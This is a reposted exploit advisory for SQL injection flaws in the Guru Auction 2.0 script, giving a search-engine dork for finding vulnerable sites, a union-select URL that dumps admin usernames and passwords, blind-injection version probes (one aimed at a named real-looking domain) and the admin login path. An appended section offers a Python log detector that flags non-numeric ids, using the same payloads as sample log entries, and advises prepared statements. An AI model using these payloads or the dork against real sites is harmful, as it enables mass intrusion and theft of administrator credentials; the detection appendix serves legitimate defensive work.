China Network Penetration Testing Alliance
Title: Guru Auction 2.0 Multiple SQL Injection
Author: admin
Time: 2012-12-31 09:24
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
Blind SQLi p0c:
~~~~~~~~~~
http://www.political-security.com/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
Admin login entry:
~~~~~~~~~~
http://domain.tld/[path]/admin/
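
Both parameters above, cate_id and item_id, are numeric ids, so any request carrying a non-integer value for them stands out in the web server log. The following detection sketch is an added example, not part of the original advisory or the vendor's code; the combined access log format, the sample log lines (constructed) and the names WATCHED and suspicious_requests are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and numeric id parameters named in the advisory.
WATCHED = {"subcat.php": "cate_id", "detail.php": "item_id"}

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Dec/2012:09:20:01 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [31/Dec/2012:09:21:13 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 912',
    '192.0.2.44 - - [31/Dec/2012:09:21:40 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 4077',
    '192.0.2.10 - - [31/Dec/2012:09:22:02 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 4077',
]


def suspicious_requests(log_lines):
    """Return (script, param, decoded_value) for watched ids that are not plain integers."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qsl decodes %xx and '+' so encoded payloads are compared in clear text.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and not re.fullmatch(r"[0-9]+", value):
                hits.append((script, param, value))
    return hits


if __name__ == "__main__":
    for script, param, value in suspicious_requests(SAMPLE_LOG):
        print(f"{script}: non-numeric {param} -> {value!r}")
```

The same integer-only rule belongs in the application itself: validating cate_id and item_id as integers and binding them in prepared statements removes the injection instead of only logging it.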
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/)